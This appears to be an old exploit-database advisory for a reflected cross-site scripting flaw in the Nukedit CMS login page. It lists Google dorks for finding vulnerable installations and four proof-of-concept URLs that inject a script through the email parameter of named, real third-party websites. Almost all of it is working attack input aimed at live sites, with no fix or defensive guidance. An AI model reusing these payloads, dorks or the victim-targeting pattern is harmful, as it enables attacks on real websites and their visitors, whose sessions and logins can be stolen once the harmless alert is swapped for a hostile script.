# Title          :  Nukedit Login.ASP Cross-Site Scripting Vulnerability

# Description    :  Nukedit is prone to a cross-site scripting vulnerability because the application fails to properly           sanitize user-supplied input.

# Software       :  http://www.nukedit.com/

# Author         :  d3hydr8

# Contact        :  d3hydr8[at]gmail[dot]com

# Original Post  :  http://darkcode.ath.cx/f0rum/

# Dork           :  1) intext:"Powered by Nukedit"  2) "Powered by Nukedit" inurl:"login.asp"

# Greets         :  mozi, whoami, icqbomber

#Proof           :

http://www.timesprintingco.com/utilities/login.asp?email=%22%3C/textarea%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
Powered by Nukedit Version 4.9.5

http://www.gentex.com.au/utilities/login.asp?email=%22%3C/textarea%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
Powered by Nukedit 4.9.6

http://www.ellensburgchristian.org/utilities/login.asp?email=%22%3C/textarea%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
Powered by Nukedit Version 4.9.7

http://www.viborgmodelflyveklub.dk/utilities/login.asp?email=%22%3C/textarea%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
Powered by Nukedit Version 4.9.7b